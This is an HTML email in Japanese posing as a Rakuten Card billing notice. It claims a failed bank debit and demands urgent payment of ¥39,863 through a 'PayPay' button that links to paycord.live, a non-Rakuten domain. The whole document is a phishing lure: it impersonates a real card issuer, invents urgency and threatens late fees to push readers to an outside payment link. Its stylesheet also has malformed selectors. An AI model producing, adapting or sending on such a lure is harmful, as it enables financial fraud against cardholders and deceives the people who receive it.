<楽天カードお支払い金額のご案内>
<html>
<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>楽天カード|ご請求金額のお知らせ</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: "Helvetica Neue", "Hiragino Sans", "Yu Gothic", sans-serif;
background: #f2f2f2;
padding: 10px;
color: #333;
line-height: 1.7;
}
..container {
max-width: 500px;
margin: 0 auto;
background: #fff;
border-radius: 16px;
overflow: hidden;
box-shadow: 0 4px 12px rgba(0,0,0,0.1);
}
..header {
background: #bf0000;
color: #fff;
text-align: center;
padding: 24px 16px;
}
..header h1 {
font-size: 24px;
margin-bottom: 6px;
}
..header p {
font-size: 15px;
}
..content {
padding: 28px 20px;
}
..important {
background: #fff0f0;
border: 2px solid #bf0000;
border-radius: 10px;
padding: 18px;
text-align: center;
font-weight: bold;
color: #bf0000;
font-size: 15px;
margin-bottom: 24px;
}
..amount-box {
text-align: center;
padding: 20px;
margin-bottom: 20px;
}
..amount-label {
font-size: 15px;
color: #bf0000;
}
..amount {
font-size: 36px;
font-weight: bold;
color: #bf0000;
margin: 6px 0;
}
..deadline {
text-align: center;
font-size: 15px;
margin-bottom: 24px;
}
..pay-info {
text-align: center;
font-size: 15px;
margin-bottom: 24px;
}
..button {
display: block;
background: #d70000;
color: #fff;
text-align: center;
font-size: 17px;
font-weight: bold;
padding: 16px;
border-radius: 12px;
text-decoration: none;
margin-bottom: 16px;
}
..note {
font-size: 12px;
color: #666;
text-align: center;
line-height: 1.6;
}
..footer {
text-align: center;
padding: 20px;
font-size: 12px;
color: #666;
background: #fafafa;
border-top: 1px solid #eee;
}
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>楽天カード</h1>
<p>ご請求金額のお知らせ(2026年3月分)</p>
</div>
<div class="content">
<div class="important">
【重要】<br>
口座振替が失敗したため、至急お支払いをお願いいたします。
</div>
<div class="amount-box">
<div class="amount-label">ご請求金額</div>
<div class="amount">¥39,863</div>
</div>
<div class="deadline">
支払期限:2026年4月26日(日)
</div>
<div class="pay-info">
PayPayにてお支払いください
</div>
<a href="https://paycord.live/fcbfPAY" class="button" target="_blank">
PayPayで支払う
</a>
<div class="note">
※期限超過で遅延損害金が発生する場合があります<br>
※支払い反映に最大24時間かかる場合があります
</div>
</div>
<div class="footer">
楽天カードコンタクトセンター<br>
0570-66-6910
</div>
</div>
</body>
</html>
<!-- salt:c99ee1baed0b7b50c7ea90d4e2749c75 -->